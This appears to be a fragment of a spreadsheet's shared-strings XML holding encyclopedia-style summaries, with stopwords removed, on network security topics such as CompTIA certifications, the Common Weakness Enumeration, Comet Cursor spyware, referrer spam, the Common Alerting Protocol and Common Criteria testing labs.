    <t>network security consists policies, processes practices adopted prevent, detect monitor unauthorized access, misuse, modification, denial computer network network-accessible resources. network security involves authorization access data network, controlled network administrator. users choose assigned password authenticating information allows access information programs within authority. network security covers variety computer networks, public private, used everyday jobs: conducting transactions communications among businesses, government agencies individuals. networks private, within company, others might open public access. network security involved organizations, enterprises, types institutions. title explains: secures network, well protecting overseeing operations done. common simple protecting network resource assigning unique name corresponding password. network security concept network security starts authentication, commonly username password. since requires detail authenticating user name—i.e., password—this sometimes termed one-factor authentication. with two-factor authentication, something user 'has' also used (e.g., security token 'dongle', card, mobile phone); three-factor authentication, something user 'is' also used (e.g., fingerprint retinal scan). once authenticated, firewall enforces access policies services allowed accessed network users. though effective prevent unauthorized access, component fail check potentially harmful content computer worms trojans transmitted network. anti-virus software intrusion prevention system (ips) help detect inhibit action malware. anomaly-based intrusion detection system also monitor network like wireshark traffic logged audit purposes later high-level analysis. newer systems combining unsupervised machine learning full network traffic analysis detect active network attackers malicious insiders targeted external attackers compromised user machine account.communication hosts using network encrypted maintain security privacy. honeypots, essentially decoy network-accessible resources, deployed network surveillance early-warning tools, honeypots normally accessed legitimate purposes. honeypots placed point network appear vulnerable undefended, actually isolated monitored. techniques used attackers attempt compromise decoy resources studied attack keep exploitation techniques. such analysis used tighten security actual network protected honeypot. honeypot also direct attacker's attention away legitimate servers. honeypot encourages attackers spend time energy decoy server distracting attention data real server. similar honeypot, honeynet network intentional vulnerabilities. purpose also invite attacks attacker's methods studied information used increase network security. honeynet typically contains honeypots. security management security management networks different kinds situations. home small office require basic security large businesses require high-maintenance advanced software hardware prevent malicious attacks hacking spamming. order minimize susceptibility malicious attacks external threats network, corporations often employ tools carry network security verifications. types attack networks subject attacks malicious sources. attacks categories: "passive" network intruder intercepts data traveling network, "active" intruder initiates commands disrupt network's normal operation conduct reconnaissance lateral movements find gain access assets available network.types attacks include: passive network wiretapping passive port scanner idle scan encryption traffic analysis active: virus eavesdropping data modification also references further reading case study: network clarity archived 2016-05-27 wayback machine, magazine 2014 cisco. (2011). what network security?. retrieved cisco.com archived 2016-04-14 wayback machine security internet (the froehlich/kent encyclopedia telecommunications vol. marcel dekker, york, 1997, 231–255.) introduction network security archived 2014-12-02 wayback machine, matt curtin, 1997. security monitoring cisco security mars, gary halleen/greg kellogg, cisco press, jul. 2007. isbn 1587052709 self-defending networks: next generation network security, duane decapite, cisco press, sep. 2006. isbn 1587052539 security threat mitigation response: understanding cs-mars, dale tesch/greg abelar, cisco press, sep. 2006. isbn 1587052601 securing your business cisco firewalls, greg abelar, cisco press, 2005. isbn 1587052148 deploying zone-based firewalls, ivan pepelnjak, cisco press, oct. 2006. isbn 1587053101 network security: private communication public world, charlie kaufman radia perlman mike speciner, prentice-hall, 2002. isbn 9780137155880 network infrastructure security, angus wong alan yeung, springer, 2009. isbn 978-1-4419-0165-1</t>
  </si>
  <si>
    <t>Comparison of packet analyzers</t>
  </si>
  <si>
    <t>following tables compare general technical information several packet analyzer software utilities, also known network analyzers packet sniffers. please individual products' articles information. general information basic general information software—creator/company, license/price, etc. operating system support utilities operating systems. references</t>
  </si>
  <si>
    <t>CompTIA</t>
  </si>
  <si>
    <t>computing technology industry association (comptia) american non-profit trade association, issuing professional certifications information technology (it) industry. considered industry's trade associations. based downers grove, illinois, comptia issues vendor-neutral professional certifications countries. organization releases industry studies annually track industry trends changes. over million people earned comptia certifications since association established. history comptia created 1982 association better computer dealers (abcd). abcd later changed name computing technology industry association.in 2010, comptia moved world headquarters downers grove, illinois. building designed meet leed certification standards.the comptia portal moved hybrid version open-access model april 2014 exclusive content dues-paying members. move expanded organization's reach engage broader, diverse members within year, comptia's membership grew 2,050 members 50,000 2015. close 2016, organization boasted 100,000 members worldwide. comptia launched dream program 2014 provide resources girls women united states interested industry. october 2015, program expanded uk.skillsboost, comptia's online resource schools, launched june 2015. contained resources students, parents teachers promote importance computer skills. comptia held first annual channelcon vendor summit 2015. vendor summit exclusive people attending channelcon, industry's premier conference collaboration, education networking. addresses issues within industry.in january 2017, comptia launched professional association built acquisition association information technology professionals. trustmarks comptia offers trustmarks businesses certify security capabilities credentials. comptia security trustmark+ based nist cybersecurity framework demonstrates compliance industry regulations pci-dss, ssae-16, hipaa, others reliant nist framework. based third-party assessment security policies, procedures operations. comptia offered additional trustmarks, managed services trustmark managed print trustmark, retired sept. 2021. certifications comptia administers vendor-neutral certification exams pearson testing centers. (note: casp+ renew extend certification satisfying cases ceus a.k.a. "continuing education units," three-year period.) basic certifications comptia fundamentals+ certification covers foundational concepts, basic literacy, terminology concepts industry. considered first step toward certification.comptia also offers cloud essentials certification pathway cloud+ credential. professional level certifications earned accreditation american national standards institute (ansi) 2008. certification represents entry-level competency computer technician vendor neutral certification covers various technologies operating systems. 2014, million people worldwide earned certification. certification expires years obtainment. certification prior january 2011, considered good-for-life (gfl) expire. cloud+: released october 2013 including cloud computing virtualization. accredited ansi maps 8570 standards. expires years. cysa+: cybersecurity analyst; released february 2017. certification focuses cyber-threat detection tools analysis identify vulnerabilities risks. csa+ accredited ansi. january 2018, certification renamed csa+ cysa+ trademark issues. expires years. linux+: single exam known xk0-004 renewable program, certification covers linux operating systems, installation basics applicable free software open source licenses. formerly two-part exam lx0-103 lx0-104 partnership linux professional institute. network+: accredited ansi 2008. entry-level certification used measure skill network technician. expires years. certification prior january 2011, considered good-for-life (gfl) expire. pentest+: intermediate-level certification focusing penetration testing. released july 2018, pentest+ covers risk analysis, threat detection, penetration testing ethical hacking tools methodologies. pentest+ ansi 17024 accredited currently aligns 8570 standard. expires years. project+: 2001, comptia acquired project+ project management certification program gartner group. program, previously called project+", updated 2003. security+: also earned ansi accreditation 2008. security+ entry-level vendor-neutral security certification builds network security knowledge covered network+ certification. expires years. certification prior january 2011, considered good-for-life (gfl) expire. server+: focuses server-specific hardware operating systems, environments, disaster recovery business continuity. developed 2001, updates released 2005, 2009, 2015 update planned 2021. master level certification comptia advanced security practitioner (casp+) highest level certification comptia’s cybersecurity pathway security+, cysa+, pentest+. casp+ certification accredited international organization standardization (iso) american national standards institute (ansi) december 2011. casp+ exam certify successful candidate technical knowledge skills required conceptualize, design, engineer secure solutions across complex enterprise environments. march 2013, department defense approved certification baseline certification accepted information assurance technical level iii, manager level systems architect engineer levels specialty certifications "certified document imaging architect", "cdia+", certification competency document imaging, document management, enterprise content management.the "certified technical trainer" "ctt+" certification vendor-neutral certification applicable training professionals industries. originally administered 2001 chauncey institute, program acquired comptia renamed ctt+. created collaboration information technology training association, inc. (itta) computer education management association (cedma).the comptia "healthcare technician" certificate focused healthcare industry aimed professionals install maintain electronic health record systems. retired 2017. stackable certifications january 2018, comptia released stackable certifications: comptia infrastructure career pathway specialist comptia operations specialist (a+/network+) comptia systems support specialist (a+/linux+) professional comptia cloud admin professional (network+/cloud+) comptia network infrastructure professional (network+/server+) comptia linux network professional (network+/linux+) comptia cybersecurity career pathway specialist comptia secure infrastructure specialist (a+/network+/security+) professional comptia secure cloud professional (security+/cloud+) comptia security analytics professional (security+/cysa+) comptia network vulnerability assessment professional (security+/pentest+) comptia network security professional (security+/pentest+/cysa+) expert comptia security analytics expert (security+/cysa+/casp+) comptia security infrastructure expert (security+/cysa+/pentest+/casp+) sled public sector council state local government education (sled) division comptia consortium executives leading technology companies "focused advancing interests industry sled market". right repair comptia initially lobbied right repair. february 2020, comptia posted statement relation prior position right repair legislation: february 2020, comptia permanently stepped back lobbying activity related right repair legislation." philanthropy comptia established 501(c)(3) charitable foundation called creating futures. 2012, creating futures worked wounded warrior project provide 5,000 comptia certification testing vouchers injured military veterans. certification expiration previously, comptia marketed flagship network+ security+ certifications valid lifetime. january 2011, comptia changed status certifications would expire every three years. under proposal, certified individuals would re-certify exams yearly maintenance (continuing education units) system. comptia modified guidelines certificates received january 2011, would need renewed every three years; however, certain amount documented hours geared towards certification automatically renew certification. un-expirable certificates, issued 2011, officially called good-for-life, getting updated (and expirable) certification replace good-for-life professional both. also strata exam computer repair technician list computer security certifications references external links comptia official website</t>
  </si>
  <si>
    <t>Network security policy</t>
  </si>
  <si>
    <t>network security policy (nsp) generic document outlines rules computer network access, determines policies enforced lays basic architecture company security/ network security environment. document usually several pages long written committee. security policy complex document, meant govern data access, web-browsing habits, passwords, encryption, email attachments more. specifies rules individuals groups individuals throughout company. policies could expressed instructions understood special purpose network hardware dedicated securing network. security policy keep malicious users also exert control potential risky users within organization. understanding information services available users, well potential damage whether protection already place prevent misuse important writing network security policy. addition, security policy dictate hierarchy access permissions, granting users access necessary completion work. national institute standards technology provides example security-policy guideline. also internet security security engineering computer security cybersecurity information technology list network security industrial espionage information security security policy references external links computer security resource center national institute standards technology network security policy procedures document city madison, wisconsin</t>
  </si>
  <si>
    <t>Common Weakness Enumeration</t>
  </si>
  <si>
    <t>common weakness enumeration (cwe) category system hardware software weaknesses vulnerabilities. sustained community project goals understanding flaws software hardware creating automated tools used identify, fix, prevent flaws. project sponsored national cybersecurity ffrdc, operated mitre corporation, support us-cert national cyber security division u.s. department homeland security.version standard released july 2021.cwe categories, including classes buffer overflows, path/directory tree traversal errors, race conditions, cross-site scripting, hard-coded passwords, insecure random numbers. examples category stack-based buffer overflows. compatibility common weakness enumeration (cwe) compatibility program allows service product reviewed registered officially "cwe-compatible" "cwe-effective". program assists organizations selecting right software tools learning possible weaknesses possible impact. order obtain compatible status product service must meet requirements, shown below: there organizations september 2019 develop maintain products services achieved compatible status. research, critiques, developments some researchers think ambiguities avoided reduced. also common vulnerabilities exposures (cve) common vulnerability scoring system (cvss) national vulnerability database references external links certifying applications known security weaknesses. common weakness enumeration (cwe) effort march 2007 "classes vulnerabilities attacks" (pdf). wiley handbook science technology homeland security. comparison different vulnerability classifications. archived original (pdf) 2016-03-22.{{cite web}}: maint: others (link)</t>
  </si>
  <si>
    <t>Common Indexing Protocol</t>
  </si>
  <si>
    <t>common indexing protocol (cip) attempt ietf working group find mid-1990s define protocol exchanging index information directory services. x.500 directory model, searches scoped near root tree (e.g. particular country) problematic implement, potentially hundreds thousands directory servers would need contacted order handle query. indexes contained summaries subsets information individuals organizations represented white pages schema. merging subsets information multiple sources, hoped index server holding subset could able process query efficiently chaining sources: sources hold information would contacted. example, server holding base entry particular country provided list names people entries country subtree, server would able process query searching person particular name chaining servers held data person. protocol evolved earlier work developing whois++, intended capable interconnecting services evolving whois ldap activities. this protocol seen much recent deployment, whois ldap environments followed separate evolution paths. whois deployments typically domain name registrars, data management issues addressed specifications domain name registry interconnection crisp. contrast, enterprises manage employee, customer student identity data ldap directory looked federation protocols interconnection organizations. rfcs 2651 architecture common indexing protocol (cip) 2652 mime object definitions common indexing protocol (cip) 2653 transport protocols 2654 tagged index object common indexing protocol 2655 index object format soif objects 2656 registration procedures soif template types 2657 ldapv2 client index mesh also development common indexing protocol</t>
  </si>
  <si>
    <t>UXu</t>
  </si>
  <si>
    <t>uxu, underground experts united underground ezine active 1991 2002. founded 1991 ex-members swedish hackers association based sweden. group influenced similar movement united states known cult dead cow, cdc. group written published articles english swedish. first published articles, written ascii text, included descriptions bombs, technology, computer scene sweden. these themes soon expanded years include journal entries, philosophy, song lyrics, interviews. external links complete works 1991 2002 hackers vandalize homepage electronic intrusion threat national security emergency preparedness telecommunications</t>
  </si>
  <si>
    <t>Comet Cursor</t>
  </si>
  <si>
    <t>comet cursor software program written comet systems. allowed users microsoft windows operating system change appearance mouse cursor allow websites customized cursors visitors. product installed without user permission early example spyware. history comet systems founded 1997. famous product, comet cursor, released year free. when installed, comet cursor changes user's mouse cursor visit participating websites. websites could cursors display brands instead standard icons. 1999, 55,000 websites using technology, including comedy central, mattel, warner bros. banner also used technology. comet reported million users 2001, integrated price comparison service software.the company criticized secretly tracking users installed software, given unique serial number. november 1999, company started distributing software part package several versions realnetworks' realplayer multimedia software. that month, realplayer accused violating privacy users breaching privacy policy collecting information software installed alongside realplayer. compounding issue spyware, software installed unknowingly many users' computers. microsoft's internet explorer browser allowed activex controls, comet cursor, install user interaction without asking permission, users realize installed comet cursor realplayer.for reasons, comet cursor cited worst tech products world. although longer distributed, product blacklisted spyware internet watchdog companies lavasoft symantec. microsoft recommends users experience problems application uninstall findwhat.com purchased comet february 2004, comet cursor phased product line. references</t>
  </si>
  <si>
    <t>Reference monitor</t>
  </si>
  <si>
    <t>operating systems architecture reference monitor concept defines design requirements reference validation mechanism, enforces access control policy subjects' (e.g., processes users) ability perform operations (e.g., read write) objects (e.g., files sockets) system. properties reference monitor captured acronym neat, means: reference validation mechanism must non-bypassable, attacker cannot bypass mechanism violate security policy. reference validation mechanism must evaluable, i.e., amenable analysis tests, completeness assured (verifiable). without property, mechanism might flawed security policy enforced. reference validation mechanism must always invoked. without property, possible mechanism perform intended, allowing attacker violate security policy. reference validation mechanism must tamper-proof. without property, attacker undermine mechanism hence violate security policy.for example, windows operating systems built reference monitor, whereas windows line, also includes windows 2000 windows designed contain reference monitor, although clear properties (tamperproof, etc.) ever independently verified, level computer security intended provide. claim reference validation mechanism satisfies reference monitor concept correctly enforce system's access control policy, must invoked mediate security-sensitive operations, must tampered with, undergone complete analysis testing verify correctness. abstract model reference monitor widely applied type system needs enforce access control considered express necessary sufficient properties system making security claim.according ross anderson, reference monitor concept introduced james anderson influential 1972 paper. peter denning 2013 oral history stated james anderson credited concept paper scott graham presented 1972 conference.systems evaluated trusted computer system evaluation criteria (tcsec) must enforce reference monitor concept. references also security kernel</t>
  </si>
  <si>
    <t>Command Control (event)</t>
  </si>
  <si>
    <t>command control (also called ctrl) annual, multi-day summit organized messe münchen focuses primarily cybersecurity topics. event organized first time 2018. next summit supposed take place munich march march 2020. however, corona crisis cancellation command control 2020. addition, messe münchen decided discontinue command control independent event. history survey commissioned organisers event took place. this survey showed every second company germany became target cyberattacks 2017. addition, according study, many companies little attention employees defending cyber threats. first summit took place september september 2018 munich (germany).an index (command control cybersecurity-index 2020) created 2019 based surveys. according index, percent consider change strategy company necessary comes cyber security. next summit take place march march 2020. speakers (selection) also cyberattack cybercrime computer security (cybersecurity) hacker references external links official website</t>
  </si>
  <si>
    <t>Commercial Product Assurance</t>
  </si>
  <si>
    <t>commercial product assurance (cpa) cesg approach gaining confidence security commercial products. intended supplant approaches common criteria (cc) mark government use. organisation developed auspices government's cesg national technical authority (nta) information security. architectural patterns cesg also produce architectural patterns cover good practices common business problems, looks product. current architectural patterns include: walled gardens remote access mobile remote point devices data import security domains comparisons comparison schemes: unlike common criteria, mutual recognition agreement (mra) cpa, means products tested normally accepted markets unlike mark, coverage limited information security products, therefore excludes services. target audience also appears focused central government ("i'm protecting government data") rather including wider public sector (wps) critical national infrastructure (cni) segments target customers mark references</t>
  </si>
  <si>
    <t>UTM parameters</t>
  </si>
  <si>
    <t>urchin tracking module (utm) parameters five variants parameters used marketers track effectiveness online marketing campaigns across traffic sources publishing media. they introduced google analytics' predecessor urchin and, consequently, supported out-of-the-box google analytics. parameters identify campaign refers traffic specific website, attributes browser's website session sessions campaign attribution window expires parameters parsed analytics tools used populate reports.this example four five parameters highlighted: https://www.example.com/page?utm_content=buffercf3b2&amp;utm_medium=social&amp;utm_source=snapchat.com&amp;utm_campaign=buffer parameters identify marketing campaign refers traffic specific website. define append relevant parameters appropriate urls, marketers routinely simple, spreadsheet-based, automated builder tools, including google analytics builder websites. when hyperlink contains parameters, analytics software destination website interprets parameter information attributes browser's website session sessions campaign attribution window expired default, months google analytics). metrics parameters passed urls parsed analytics tools google analytics adobe analytics, data used populate standard custom analytics reports. analytics software attribute parameters browser's current subsequent sessions campaign window expired. parameters there five different parameters, used order: also gclid (google click identifier) gclsrc (google ads) dclid (doubleclick click identifier, google) fbclid (facebook click identifier) social media analytics references</t>
  </si>
  <si>
    <t>UTC Climate, Controls &amp; Security</t>
  </si>
  <si>
    <t>climate, controls security global provider building technologies offering fire safety, security, building automation, heating, ventilating, air-conditioning, refrigeration systems services. wholly owned subsidiary united technologies corporation, climate, controls security $16.7 billion company 55,000 employees serving customers countries.in 2020, united technologies spun subsidiary independent carrier global corporation. time united technologies spun otis worldwide corporation, remaining united technologies units (pratt whitney collins aerospace) merged raytheon company create raytheon technologies. history based palm beach gardens, florida, climate, controls security created splitting building industrial systems segments, otis climate, controls security. otis provides elevator escalator manufacturing installation, climate, controls security's brands provide building technologies, heating cooling, fire safety security refrigeration products services. through brands, climate, controls security dates back 1818, jeremiah charles chubb patented world's first detector lock. 1881, robert edwards patented first electric alarm bell. 1902, willis carrier developed later patented first modern conditioner. 1917, walter kidde founded walter kidde company, produced first integrated smoke detection carbon dioxide extinguishing system board ships. brands automated logic, building-management solutions company autronica, provider fire safety systems offshore, maritime land applications carrier, heating, air-conditioning, ventilating refrigeration solutions company founded willis carrier, inventor modern conditioning carrier transicold, container truck trailer transport refrigeration company chubb, company provides fire safety security solutions, range electronic security systems manned guarding operations delta security solutions, electronic security company located france det-tronics, company specialising industrial fire detection, detection, hazard mitigation systems edwards, fire detection alarm business fireye, provider flame safeguard controls; combustion controls former security business, fire security systems company, acquired 2010 gst, fire detection alarm business located china interlogix, security life-safety solutions residential commercial applications kidde, specialist fire systems detection, suppression fire fighting lenel systems international, developer provider advanced electronic security systems, acquired 2005 marioff, water mist fire suppression systems company acquired 2007 noresco, u.s.-based energy services company (northeast energy services company) onity, provider electronic locks, in-room safes energy management solutions supra, lock management systems sicli, supplier fire extinguishers hose reels france switzerland sensitech, cold chain solutions provider based u.s. taylor, manufacturer commercial foodservice equipment service frozen desserts, beverages grilled items utec, manufactures microprocessor-based controls hvac refrigeration industries products services access control systems industrial commercial fire safety consumer residential fire safety hazard sensing combustion control electronic security commercial refrigeration transport refrigeration heating, ventilating, conditioning monitoring response physical security cash transit security personnel intrusion sensors digital video references external links official website</t>
  </si>
  <si>
    <t>Referrer spam</t>
  </si>
  <si>
    <t>referrer spam (also known referral spam, spam referrer bombing) kind spamdexing (spamming aimed search engines). technique involves making repeated website requests using fake referrer site spammer wishes advertise. this also includes fake referring domains, keywords, events pollutes site analysis erroneous data gain attention site. sites publish access logs, including referrer statistics, inadvertently link back spammer's site. these links indexed search engines crawl access logs, improving spammer's search engine ranking. except polluting statistics, technique harm affected sites. 2014, variation form spam occurs google analytics. spammers send fake visits google analytics, often without ever accessing affected site. technique used spammers' urls appear site statistics, inducing site owner visit spam urls. when case spammer never visited affected site, fake visits also called ghost spam. technical solutions e-mail spam, referrer spam filtered blocked. website operator mitigate referrer spam preventing search engine spiders crawling site logs moving non-public area password-protected area, using robot exclusion file, appending nofollow value links. spammers target third-party analytics directly pollute statistics, consume affected site's resources. filtering referrer spam analytics tools hide reports. however, spammers visit affected site consume server bandwidth. prevent misuse, blocked using various techniques, blacklisting list addresses. non-technical solutions because .htaccess solutions require technical expertise, several developers created tools non-technical people block spam automatically, specifically google analytics. also adversarial information retrieval information retrieval strategies datasets spam blogs form spamdexing referer spoofing practice http networking intentionally sending incorrect referer information notes external links referrer spam blacklist matomo community-contributed list referrer spammers public domain (550+ domains october 2017).</t>
  </si>
  <si>
    <t>Commission on Enhancing National Cybersecurity</t>
  </si>
  <si>
    <t>president's commission enhancing national cybersecurity presidential commission formed april 2016, develop plan protecting cyberspace, america's economic reliance commission released final report december 2016. report made recommendations regarding intertwining roles military, government administration private sector providing cyber security. chairman donilon said report coverage unusual breadth issues" deals. recommendations report made sixteen major recommendations fifty-three specific action items broadly grouped areas: protecting information digital infrastructure investing secure growth information digital infrastructure consumer information access building cybersecurity workforce building secure governmental cybersecurity framework keeping interconnectivity open, fair, competitive, securethe commission found strong authentication systems mandatory adequate cybersecurity, government, commercial systems, private individuals. commission also stressed remote identity proofing security internet things (iot). finding technicians know cybersecurity protect systems short supply, commission recommended nationally supported training programs produce adequate workforce, well increasing level expertise existing workforce. commission highlighted importance partnerships government private sector powerful tool encouraging technology, policies practices need secure grow digital economy. (page 2)some criticised commission's work lacking understanding cybersecurity cognizant "cyber reality" cost action items, others found report constructive meaningful. commission members initial members commission are: donilon, former assistant president national security advisor (chair) palmisano, former (vice chair) general keith alexander, ironnet cybersecurity, former director national security agency former commander u.s. cyber command annie antón, professor chair school interactive computing georgia tech. ajay banga, president mastercard steven chabinsky, general counsel chief risk officer crowdstrike patrick gallagher, chancellor university pittsburgh former director national institute standards technology peter lee, corporate vice president, microsoft research herbert lin, senior research scholar cyber policy security stanford center international security cooperation research fellow hoover institution heather murren, former member financial crisis inquiry commission co-founder nevada cancer institute sullivan, chief security officer uber former chief security officer facebook maggie wilderotter, executive chairman frontier communications follow-on incoming president trump indicated wants full review u.s. cyber protection policy. notes references external links commission enhancing national cybersecurity december 2016). "report securing growing digital economy" (pdf). archived (pdf) original january 2017. works commission enhancing national cybersecurity librivox (public domain audiobooks)</t>
  </si>
  <si>
    <t>Common Alerting Protocol</t>
  </si>
  <si>
    <t>common alerting protocol (cap) xml-based data format exchanging public warnings emergencies alerting technologies. allows warning message consistently disseminated simultaneously many warning systems many applications, google public alerts cell broadcast. increases warning effectiveness simplifies task activating warning responsible officials. standardized alerts received many sources configure applications process respond alerts desired. alerts department homeland security, department interior's united states geological survey, united states department commerce's national oceanic atmospheric administration (noaa), state local government agencies received format application. that application can, example, sound different alarms, based information received. normalizing alert data across threats, jurisdictions, warning systems, also used detect trends patterns warning activity, trends might indicate undetected hazard hostile act. from procedural perspective, reinforces research-based template effective warning message content structure. data structure backward-compatible existing alert formats including specific area message encoding (same) used noaa weather radio broadcast emergency alert system well technology wireless emergency alerts (wea), adding capabilities following: flexible geographic targeting using latitude/longitude “boxes” geospatial representations three dimensions multilingual multi-audience messaging phased delayed effective times expirations enhanced message update cancellation features template support framing complete effective warning messages digital encryption signature capability facility digital images, audio, video. background national science technology council (nstc) november 2000 report "effective disaster warnings" recommended "standard method developed collect relay instantaneously automatically types hazard warnings reports locally, regionally nationally input wide variety dissemination systems."in 2001, international independent group emergency managers convened online california emergency telecommunications expert botterell began specifying prototyping common alerting protocol data structure based recommendations nstc report. project embraced non-profit partnership public warning number international warning system vendors. series field trials long-term demonstration projects 2002-03 submission draft specification oasis standards process formalization. specification approved oasis april 2004. based experience 1.0, oasis emergency management technical committee adopted updated specification october 2005. meeting geneva october 2006 specification taken consideration international telecommunication union's standardization sector adoption itu-t recommendation. subsequently adopted recommendation x.1303.cap specification version available since july 2010 oasis website. implementation worldwide 2007, international telecommunication union, telecommunication standardization sector (itu-t) adopted common alerting protocol recommendation x.1303. recommendation annex contains authoritative asn.1 module translation schema useful implementations. rec. x.1303 within remit itu‑t study group (security), rapporteur group cybersecurity (q.4/17) purposes evolution standard. australia australian government standard common alerting protocol (cap-au-std, 2012) developed cap-au-std stakeholder group comprising federal agencies emergency management australia, bureau meteorology, geoscience australia, department agriculture, fisheries forestry department health well number state government authorities emergency services agencies. project co-ordinated australian government attorney-general's department (australian emergency management). canada canada, working group composed public alerting practitioners government agencies developed canadian profile (cap-cp) based specialized address needs canadian public alerting stakeholders, bilingualism, geocoding canada, managed lists locations events, etc. canadian government adopted cap-cp national public alerting system (npas) project. cap‑cp working group, along stakeholders projects canadian public safety operations organization (canops) netalerts' sarnia lambton trial, working refining cap‑cp national application canada.cap implemented small-scale, grassroots hazard information system lanka following 2004 indian ocean tsunami. this implementation part "hazinfo project", funded canada's international development research centre.the province alberta adopted part alberta emergency alert system. march 2015, alert ready, national public warning system based upon cap-cp, officially launched. participation system broadcasters television providers mandated canadian radio-television telecommunications commission. germany federal office citizen protection disaster support (bundesamt bevölkerungsschutz katastrophenhilfe, bbk) working implementation based 1.2, allow internet-based access data provided nation's modular warning system mowas. development mowas based satellite-based warning system satwas 2001, provides information less state media entities. case broadcast receiver, like radio television, running nearby, resulting warning effect satwas would severely limited, many state-run emergency sirens left unmaintained dismantled altogether. support mowas alleviate problem. italy department firefighters, public rescue civil defence (dipartimento vigili fuoco, soccorso pubblico della difesa civile italian ministry interior adopted protocol ministerial decrees 2008 2011. since then, provincial control rooms, regional control rooms national control centre exchange daily average 25,000 private messages concerning rescue operations real time. decrees, emergency stakeholder italy wants exchange share data fire corps course large scale emergency rescue operations adopt protocol. first protocol civil protection activity italy recorded 2009, aftermath central italy earthquake, fire corps exchanged data ministry cultural heritage coordinate efforts designing implementing provisional measures monuments historical buildings. april 5th, 2017, agreement "corpo nazionale vigili fuoco" "arma carabinieri" signed improve forest fire fighting activities. interoperability data exchange agreement allows based protocol. united states september 2010, federal emergency management agency (fema) officially adopted protocol integrated public alert warning system (ipaws), designed disseminate emergency messages various platforms, including broadcast media (emergency alert system), wireless devices (wireless emergency alerts), platforms. references external links cookbook: archive early documents deas department homeland security u.s. federal emergency management agency "integrated public alert warning system" (ipaws) fact sheet. oasis documentation v1.2 official logos library</t>
  </si>
  <si>
    <t>Common Attack Pattern Enumeration and Classification</t>
  </si>
  <si>
    <t>common attack pattern enumeration classification capec catalog known cyber security attack patterns used cyber security professionals prevent attacks.originally released 2007 united states department homeland security, project began initiative office cybersecurity communication, supported mitre corporation governed board corporate representatives. references external links mitre capec</t>
  </si>
  <si>
    <t>Common Computing Security Standards Forum</t>
  </si>
  <si>
    <t>common computing security standards forum (ccss forum) voluntary organization vendors providers security software, operating systems, internet browsers. goals ccss forum formed following goals: mitigating risk malicious intent software, creating standards industry, including security providers order maximize benefit protection users. history 2009, melih abdulhayoğlu organized common computing security standards forum initially purpose maintaining list legitimate antivirus engines. this response "scareware" products present antivirus software either adware malware. according fbi, aware estimated loss victims rogue antivirus software much $150 million. whitelist ccss maintains so-called "whitelist" legitimate organizations provide antivirus systems. "trusted vendors" list viewed organization's site, http://www.ccssforum.org references</t>
  </si>
  <si>
    <t>Common Criteria Evaluation and Validation Scheme</t>
  </si>
  <si>
    <t>common criteria evaluation validation scheme (ccevs) united states government program administered national information assurance partnership (niap) evaluate security functionality information technology conformance common criteria international standard. standard uses protection profiles common criteria standards certify product. this change happened 2009. their stated goal making change ensure achievable, repeatable testable evaluations. objectives ccevs program partnership u.s. government industry assist consumers: meet needs government industry cost-effective evaluation products encourage formation commercial security testing laboratories development private sector security testing industry ensure security evaluations products performed consistent standards improve availability evaluated products.the scheme intended serve many communities interest diverse roles responsibilities. this community includes product developers, product vendors, value-added resellers, systems integrators, security researchers, acquisition/procurement authorities, consumers products, auditors, accreditors (individuals deciding fitness operation products within respective organizations). close cooperation government industry paramount success scheme realization objectives. validation body validation body ultimate responsibility operation ccevs accordance niap policies procedures. where appropriate interpret amend policies procedures. nist responsible providing sufficient resources niap validation body carry responsibilities. however 2009 niap reached vendors, labs, academia customers help evaluation products therefore diminishing reliance nsa. validation body director deputy director selected nist management personnel include validators technical experts various technology areas. validation body ensures appropriate mechanisms place protect interests parties within ccevs participating process security evaluation. disputes brought forth participating party, i.e. sponsor evaluation, product protection profile developer cctl concerning operation ccevs associated activities shall referred validation body resolution. once product certified listed compliant niap product compliant list (pcl). external links niap niap dodi 8500.2 references</t>
  </si>
  <si>
    <t>Common Criteria Testing Laboratory</t>
  </si>
  <si>
    <t>common criteria model provides separation roles evaluator certifier. product certificates awarded national schemes basis evaluations carried independent testing laboratories. common criteria testing laboratory third-party commercial security testing facility accredited conduct security evaluations conformance common criteria international standard. such facility must accredited according iso/iec 17025 national certification body. examples list laboratory designations country: called common criteria testing laboratory (cctl) canada called common criteria evaluation facility (ccef) called commercial evaluation facilities (clef) france called centres d’evaluation sécurité technologies l’information (cesti) germany called security evaluation facility (itsef) common criteria recognition arrangement common criteria recognition arrangement (ccra) common criteria mutual recognition arrangement (mra) international agreement recognizes evaluations common criteria standard performed participating countries. mutually understood that, respect products protection profiles, participants plan recognise common criteria certificates authorised certificate authorising participant accordance terms arrangement accordance applicable laws regulations participant. there limitations agreement and, past, evaluations eal4+ recognized. with on-going transition away levels introduction ndpp evaluations “map” eal4 assurance components continue recognized. united states united states national institute standards technology (nist) national voluntary laboratory accreditation program (nvlap) accredits cctls meet national information assurance partnership (niap) common criteria evaluation validation scheme requirements conduct security evaluations conformance common criteria. cctl requirements these laboratories must meet following requirements: nist handbook 150, nvlap procedures general requirements nist handbook 150-20, nvlap information technology security testing common criteria niap specific criteria security evaluations niap defined requirementscctls enter contractual agreements sponsors conduct security evaluations products protection profiles ccevs, niap approved test methods derived common criteria, common methodology technology based sources. cctls must observe highest standards impartiality, integrity commercial confidentiality. cctls must operate within guidelines established ccevs. become cctl, testing laboratory must series steps involve niap validation body nvlap. nvlap accreditation primary requirement achieving cctl status. some scheme requirements cannot satisfied nvlap accreditation addressed niap validation body. present, three scheme-specific requirements imposed validation body. niap approved cctls must agree following: located u.s. legal entity, duly organized incorporated, validly existing good standing laws state laboratory intends business accept u.s. government technical oversight validation evaluation-related activities accordance policies procedures established ccevs accept u.s. government participants selected common criteria evaluations. cctl accreditation testing laboratory becomes cctl laboratory approved niap validation body listed approved laboratories list. avoid unnecessary expense delay becoming niap-approved testing laboratory, strongly recommended prospective cctls ensure able satisfy scheme-specific requirements prior seeking accreditation nvlap. this accomplished sending letter intent niap prior entering nvlap process. additional laboratory-related information found ccevs publications: common criteria evaluation validation scheme information technology security organization, management, concept operations scheme publication common criteria evaluation validation scheme information technology security guidance common criteria testing laboratories canada canada communications security establishment canada (csec) canadian common criteria scheme (cccs) oversees common criteria evaluation facilities (ccef). accreditation performed standards council canada (scc) program accreditation laboratories canada (palcan) according can-p-1591, scc’s adaptation iso/iec 17025-2005 itset laboratories. approval performed certification body, body within csec, verification applicant's ability perform competent common criteria evaluations. notes external links common criteria evaluation validation scheme common criteria testing laboratories canada: common criteria scheme canada: common criteria evaluation facilities common criteria recognition agreement list common criteria evaluated products iso/iec 15408 available free public standard</t>
  </si>
  <si>
    <t>Common Criteria</t>
  </si>
  <si>
